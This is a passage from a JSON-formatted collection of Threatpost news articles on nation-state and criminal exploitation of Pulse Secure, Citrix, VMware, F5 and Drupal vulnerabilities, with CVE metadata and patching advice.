[warned that attackers](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) who have already exploited the flaw to snatch up victims\u2019 credentials were using those credentials to move laterally through organizations, rendering patches useless.\n\nThen September, a successful cyberattack on an unnamed federal agency [was attributed to](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>) exploitation of the bug. \u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability \u2013 CVE-2019-11510 \u2013 in Pulse Secure,\u201d according to CISA\u2019s alert at the time. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\n## **CVE-2019-19781**\n\nThis critical directory-traversal vulnerability in the Citrix Application Delivery Controller (ADC) and Gateway that can allow remote code-execution. It was first disclosed as a zero-day in December 2019, after which Citrix [rolled out patches](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) amidst dozens of proof-of-concept exploits and skyrocketing exploitation attempts.\n\nIt affects Citrix ADC and Gateway versions before 13.0.47.24, 12.1.55.18, 12.0.63.13, 11.1.63.15 and 10.5.70.12 and SD-WAN WANOP 4000-WO, 4100-WO, 5000-WO, and 5100-WO versions before 10.2.6b and 11.0.3b.\n\n## **C****VE-2020-4006**\n\nAnd finally, a command-injection vulnerability in VMWare Workspace One Access, Access Connector, Identity Manager and Identity Manager Connector allows arbitrary command execution on underlying operating systems. A successful exploit does, however, require valid credentials to the configurator admin account, so it must be chained with another bug to use it.\n\nNonetheless, in December the NSA [warned that](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) foreign adversaries were zeroing in on exploiting the flaw, despite patches rolling out just days earlier. State actors were using the bug to pilfer protected data and abuse shared authentication systems, it said.\n\nIt affects VMware One Access 20.01 and 20.10 on Linux, VMware Identity Manager 3.3.1 \u2013 3.3.3 on Linux, VMware Identity Manager Connector 3.3.1 \u2013 3.3.3 and 19.03, VMware Cloud Foundation 4.0 \u2013 4.1, and VMware Vrealize Suite Lifecycle Manager 8.x.\n\n## **How Can I Protect Against Cyberattacks?**\n\nThe NSA recommended several best practices to protect organizations from attack:\n\n * Update systems and products as soon as possible after patches are released.\n * Assume a breach will happen; review accounts and leverage the latest eviction guidance available.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in client device configurations.\n * Adopt a mindset that compromise happens: Prepare for incident response activities.\n\n\u201cIf publicly known, patchable exploits still have gas in the tank, this is just an indictment against the status-quo disconnect between many organizations\u2019 understanding of risk and basic IT hygiene,\u201d Tim Wade, technical director on the CTO team at Vectra, told Threatpost. \u201cThe unfortunate reality is that for many organizations, the barrier to entry into their network continues to be low-hanging fruit which, for one reason or another, is difficult for organizations to fully manage.\u201d\n\nHe added, \u201cThis underscores why security leaders should assume that for all the best intentions of their technology peers, compromises will occur \u2013 their imperative is to detect, respond and recover from those events to expel adversaries before material damage is realized.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-16T18:10:09", "type": "threatpost", "title": "NSA: 5 Security Bugs Under Active Nation-State Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T18:10:09", "id": "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "href": "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; they have also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vector for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public facing applications. In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said, maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-14T21:20:46", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "modified": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:09:34", "description": "A federal agency has suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>) on Thursday, not naming the agency but providing technical details of the attack. Hackers, it said, gained initial access by using employees\u2019 legitimate Microsoft Office 365 log-in credentials to sign onto an agency computer remotely.\n\n\u201cThe cyber-threat actor had valid access credentials for multiple users\u2019 Microsoft Office 365 (O365) accounts and domain administrator accounts,\u201d according to CISA. \u201cFirst, the threat actor logged into a user\u2019s O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file. The cyber-threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization\u2019s virtual private network (VPN) server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs for how the attackers managed to get their hands on the credentials in the first place, CISA\u2019s investigation turned up no definitive answer \u2013 however, it speculated that it could have been a result of a vulnerability exploit that it said has been rampant across government networks.\n\n\u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability\u2014CVE-2019-11510\u2014in Pulse Secure,\u201d according to the alert. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\nThe patch was issued in April of 2019, but the Department of Homeland Security (DHS) in April of this year [noted that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) before the patches were deployed, bad actors were able to compromise Active Directory accounts via the flaw \u2013 so, even those who have patched for the bug could still be compromised and are vulnerable to attack.\n\nAfter initial access, the group set about carrying out reconnaissance on the network. First they logged into an agency O365 email account to view and download help-desk email attachments with \u201cIntranet access\u201d and \u201cVPN passwords\u201d in the subject lines \u2013 and it uncovered Active Directory and Group Policy key, changing a registry key for the Group Policy.\n\n\u201cImmediately afterward, the threat actor used common Microsoft Windows command line processes\u2014conhost, ipconfig, net, query, netstat, ping and whoami, plink.exe\u2014to enumerate the compromised system and network,\u201d according to CISA.\n\nThe next step was to connect to a virtual private server (VPS) through a Windows Server Message Block (SMB) client, using an alias secure identifier account that the group had previously created to log into it; then, they executed plink.exe, a remote administration utility.\n\nAfter that, they connected to command-and-control (C2), and installed a custom malware with the file name \u201cinetinfo.exe.\u201d The attackers also set up a locally mounted remote share, which \u201callowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis,\u201d CISA noted.\n\nThe cybercriminals, while logged in as an admin, created a scheduled task to run the malware, which turned out to be a dropper for additional payloads.\n\n\u201cinetinfo.exe is a unique, multi-stage malware used to drop files,\u201d explained CISA. \u201cIt dropped system.dll and 363691858 files and a second instance of inetinfo.exe. The system.dll from the second instance of inetinfo.exe decrypted 363691858 as binary from the first instance of inetinfo.exe. The decrypted 363691858 binary was injected into the second instance of inetinfo.exe to create and connect to a locally named tunnel. The injected binary then executed shellcode in memory that connected to IP address 185.142.236[.]198, which resulted in download and execution of a payload.\u201d\n\nIt added, \u201cThe cyber-threat actor was able to overcome the agency\u2019s anti-malware protection, and inetinfo.exe escaped quarantine.\u201d\n\nCISA didn\u2019t specify what the secondary payload was \u2013 Threatpost has reached out for additional information.\n\nThe threat group meanwhile also established a backdoor in the form of a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy.\n\n\u201cThe proxy allowed connections between an attacker-controlled remote server and one of the victim organization\u2019s file servers,\u201d according to CISA. \u201cThe reverse SOCKS proxy communicated through port 8100. This port is normally closed, but the attacker\u2019s malware opened it.\u201d\n\nA local account was then created, which was used for data collection and exfiltration. From the account, the cybercriminals browsed directories on victim file servers; copied files from users\u2019 home directories; connected an attacker-controlled VPS with the agency\u2019s file server (via a reverse SMB SOCKS proxy); and exfiltrated all the data using the Microsoft Windows Terminal Services client.\n\nThe attack has been remediated \u2013 and it\u2019s unclear when it took place. CISA said that it\u2019s intrusion-detection system was thankfully able to eventually flag the activity, however.\n\n\u201cCISA became aware\u2014via EINSTEIN, CISA\u2019s intrusion-detection system that monitors federal civilian networks\u2014of a potential compromise of a federal agency\u2019s network,\u201d according to the alert. \u201cIn coordination with the affected agency, CISA conducted an incident response engagement, confirming malicious activity.\u201d\n", "cvss3": {}, "published": "2020-09-24T20:47:40", "type": "threatpost", "title": "Feds Hit with Successful Cyberattack, Data Stolen", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2020-09-24T20:47:40", "id": "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "href": "https://threatpost.com/feds-cyberattack-data-stolen/159541/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T14:50:21", "description": "Threat actors exploited an [unpatched Citrix flaw](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) to breach the network of the U.S. Census Bureau in January in an attack that was ultimately halted before a backdoor could be installed or sensitive data could be stolen, according [to a report](<https://www.oig.doc.gov/OIGPublications/OIG-21-034-A.pdf>) by a government watchdog organization.\n\nHowever, investigators found that officials were informed of the flaw in its servers and had at least two opportunities to fix it before the attack, mainly due to lack of coordination between teams responsible for different security tasks, according to the report, published Tuesday by the U.S. Department of Commerce Office of Inspector General. The bureau also lagged in its discovery and reporting of the attack after it happened.\n\nThe report details and reviews the incident that occurred on Jan. 11, 2020, when attackers used the publicly available exploit for a critical flaw to target remote-access servers operated by the bureau. \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>) \nCitrix released a public notice about the zero-day flaw\u2014tracked as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\u2013in December. In January, a representative from the bureau\u2019s Computer Incident Response Team (CIRT_ attended two meetings in which the flaw was discussed and attendees even received a link to steps to use fixes which already had been issued by Citrix.\n\n\u201cDespite the publicly available notices released in December and attending two meetings on the issue in January, the bureau CIRT did not coordinate with the team responsible for implementing these mitigation steps until after the servers had been attacked,\u201d according to the report. Doing so could have prevented the attack, investigators noted.\n\n## **\u2018Partially Successful\u2019 Attack**\n\nThe Citrix products affected by the flaw\u2013[discovered](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) by Mikhail Klyuchnikov, a researcher at Positive Technologies\u2014are used for application-aware traffic management and secure remote access, respectively. At least 80,000 organizations in 158 countries\u2014about 38 percent in the U.S.\u2014use these products, formerly called NetScaler ADC and Gateway.\n\nThe initial compromise at the Census Bureau was on servers used to provide the bureau\u2019s enterprise staff with remote-access capabilities to production, development and lab networks. The servers did not provide access to 2020 decennial census networks, officials told investigators.\n\n\u201cThe exploit was partially successful, in that the attacker modified user account data on the systems to prepare for remote code execution,\u201d according to the report. \u201cHowever, the attacker\u2019s attempts to maintain access to the system by creating a backdoor into the affected servers were unsuccessful.\u201d\n\nAttackers were able to make unauthorized changes to the remote-access servers, including the creation of new user accounts, investigators reported. However, the bureau\u2019s firewalls blocked the attacker\u2019s attempts to establish a backdoor to communicate with the attacker\u2019s external command and control infrastructure.\n\n## **Other Mistakes**\n\nAnother security misstep the bureau took that could have mitigated the attack before it even happened was that it was not conducting vulnerability scanning of the remote-access servers as per federal standards and Commerce Department policy, according to the OIG.\n\n\u201cWe found that the bureau vulnerability scanning team maintained a list of devices to be scanned,\u201d investigators wrote. \u201cHowever, the remote-access servers were not included on the list, and were therefore not scanned. This occurred because the system and vulnerability scanning teams had not coordinated the transfer of system credentials required for credentialed scanning.\u201d\n\nThe bureau also made mistakes after the attack by not discovering nor reporting the incident in a timely manner, the OIG found.\n\nIT administrators were not aware that servers were compromised until Jan. 28, more than two weeks after the attack, because the bureau was not using a a security information and event management tool (SIEM) to proactively alert incident responders of suspicious network traffic, investigators found.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T14:35:49", "type": "threatpost", "title": "Postmortem on U.S. Census Hack Exposes Cybersecurity Failures", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-08-19T14:35:49", "id": "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "href": "https://threatpost.com/postmortem-on-u-s-census-hack-exposes-cybersecurity-failures/168814/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T05:52:31", "description": "More than 115,000 sites are still vulnerable to a highly critical Drupal bug \u2013 even though a patch was released three months ago.\n\nWhen it was first revealed, the bug, which has been dubbed Drupalgeddon 2.0, impacted an estimated 1+ million sites running Drupal \u2013 including major U.S. educational institutions and government organizations around the world. According to researcher Troy Mursch, up to 115,070 sites are still vulnerable, including websites of a large television network, a mass media and entertainment conglomerate and two \u201cwell-known computer hardware manufacturers.\u201d\n\nA patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available since March. Drupalgeddon 2.0 \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin.\n\nMursch said he located almost 500,000 sites using Drupal 7 (the most widely used version) using the source-code search engine PublicWWW. Any site using at least version 7.58 was not considered vulnerable, as Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are impacted (along with the Drupal 6 and 8.3.x and 8.4.x releases, according to Drupal).\n\n> I've shared the list of 115,070 vulnerable Drupal sites with [@USCERT_gov](<https://twitter.com/USCERT_gov?ref_src=twsrc%5Etfw>) and [@drupalsecurity](<https://twitter.com/drupalsecurity?ref_src=twsrc%5Etfw>). Due to the highly critical risk of CVE-2018-7600 being exploited, the list won't be shared publicly.\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003922275094052864?ref_src=twsrc%5Etfw>)\n\nOf those sites, more than 115,000 were vulnerable, said Mursch, but it may be more: He said he could not ascertain the versions used for 225,056 of the sites. Around 134,447 sites were not vulnerable.\n\nMursch told Threatpost he has passed along the list of impacted sites to CERTs and other government organizations for help notifying them.\n\nMeanwhile, while the researcher was scanning for vulnerable sites, he also found yet another new cryptojacking campaign targeting Drupal websites.\n\nThe campaign, which uses the domain name upgraderservices[.]cf to inject Coinhive, impacts over 250 websites, including a police department\u2019s website in Belgium and the Colorado Attorney General\u2019s office.\n\nCoinhive is a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who sneakily embed the code into websites and then mine Monero currency by tapping the CPU processing power of unwitting site visitors\u2019 phones, tablets and computers.\n\n> I've been monitoring the latest [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign using upgraderservices[.]cf to inject [#Coinhive](<https://twitter.com/hashtag/Coinhive?src=hash&ref_src=twsrc%5Etfw>) on vulnerable Drupal websites. The list of affected sites has been added to the spreadsheet.<https://t.co/ukZux5aSuM>\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003864551346003968?ref_src=twsrc%5Etfw>)\n\nMursch said the US-CERT has been notified of the active campaign.\n\nThe cryptomining campaign is only the most recent one to take advantage of the headache that is the Drupal glitch. Earlier in [May](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>), researchers at Imperva Incapsula found a cryptomining malware dubbed \u201ckitty\u201d targeting servers and browsers open to Drupalgeddon 2.0. Also, a [botnet ](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)dubbed Muhstik installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cThis latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale,\u201d Mursch said. \u201cIf you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-06-05T18:24:29", "type": "threatpost", "title": "Drupalgeddon 2.0 Still Haunting 115K+ Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T18:24:29", "id": "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "href": "https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:00", "description": "Yet another bad actor has taken advantage of Drupal sites still vulnerable to \u201cDrupalgeddon 2.0,\u201d this time to mine cryptocurrency.\n\nThe bad script, dubbed the \u201cKitty\u201d cryptomining malware, takes advantage of the known critical remote-code execution vulnerability in Drupal ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) to target not only servers but also browsers, according to researchers at security company Imperva Incapsula.\n\nOn servers, the attackers install a mining program \u2013 \u201ckkworker\u201d \u2013 which mines the xmrig (XMR) Monero cryptocurrency.\n\nBut the attackers are are also looking to expand their mining efforts to web app visitors using a mining script called me0w.js. They achieve this through adding the malicious JavasSript (me0w.js) to the commonly used index.php file, cashing in on the processor juice of future visitors to the infected web server site.\n\n\u201cTo win over kitty lovers\u2019 hearts, the attacker cheekily asks to leave his malware alone by printing \u2018me0w, don\u2019t delete pls i am a harmless cute little kitty, me0w,'\u201d the researchers said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120202/kitty-31.png>)\n\nTo make it all happen, the actors behind Kitty have used an open-source mining software for browsers called \u201cwebminerpool\u201d to first write a bash script \u2013 in the form of a PHP file called kdrupal.php \u2013 on a server disc.\n\n\u201cIn doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,\u201d according to Imperva\u2019s [report](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120017/kitty-1.png>)\n\nResearchers said that while the PHP backdoor is \u201cfairly light and simple,\u201d it has some tricks up its sleeve, including using the sha512 hash function to protect the attacker\u2019s remote authentication.\n\nOnce this backdoor has been established, a time-based job scheduler is registered to periodically re-download and execute a bash script from remote hosts every minute. This means the attackers can easily re-infect the server and quickly push updates to the infected servers under their control.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120100/kitty-2.png>)\n\nResearchers said the Monero address used in Kitty has been spotted before in April, in attacks targeting web servers running the vBulletin 4.2.X CMS.\n\nInterestingly, it appears the attacker has updated the malware version after every change in its code, according to the report.\n\n\u201cThe first generation of the \u2018Kitty malware\u2019 we discovered was version 1.5, and the latest version is 1.6,\u201d said the researchers. \u201cThis type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.\u201d\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up taking advantage of it.\n\nThat includes a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n", "cvss3": {}, "published": "2018-05-03T16:57:19", "type": "threatpost", "title": "Kitty Cryptomining Malware Cashes in on Drupalgeddon 2.0", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-03T16:57:19", "id": "THREATPOST:3D545239C6AE58821904FBF3069CB365", "href": "https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T05:27:29", "description": "Drupal released a patch for a \u201chighly critical\u201d flaw in versions 6, 7 and 8 of its CMS platform that could allow an attacker to take control of an affected site simply by visiting it. Drupal also warned an unprivileged and untrusted attacker could modify or delete data hosted on affected CMS platforms.\n\nThe Drupal developers alert ([SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>)) estimates over one million sites running Drupal are impacted. Affected are Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1. Also impacted is Drupal 6 and 8.3.x and 8.4.x releases, said Drupal.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned the MIRTE Common Vulnerabilities and Exposures description ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)). There is no known public exploit code in the wild and no reports of the vulnerability being exploited.\n\nThe flaw is described as \u201can input validation issue where invalid query parameters could be passed into Drupal webpages,\u201d said Tim Mackey, technology evangelist at Black Duck by Synopsys.\n\nMeanwhile, several Drupal specific hosting providers, such as Pantheon, Acquia, Platform.sh and Amazee.io, are offering platform-level solutions tied to the Web Application Firewall (WAF) layer or the way they are hosting the sites. Also, at least two security oriented content delivery network services, CloudFlare and Fastly, have also rolled-out solutions to help protect customers.\n\n\u201cThe only effective mitigation we are advising is to upgrade or second best is to put a rule into a WAF,\u201d said Greg Knaddison, a Drupal security team member and product engineer and Card.com.\n\nKnaddison said it\u2019s not exactly clear what portion of Drupal sites are vulnerable because it depends on what features are enabled or not. He said, Drupal is not releasing any of the technical 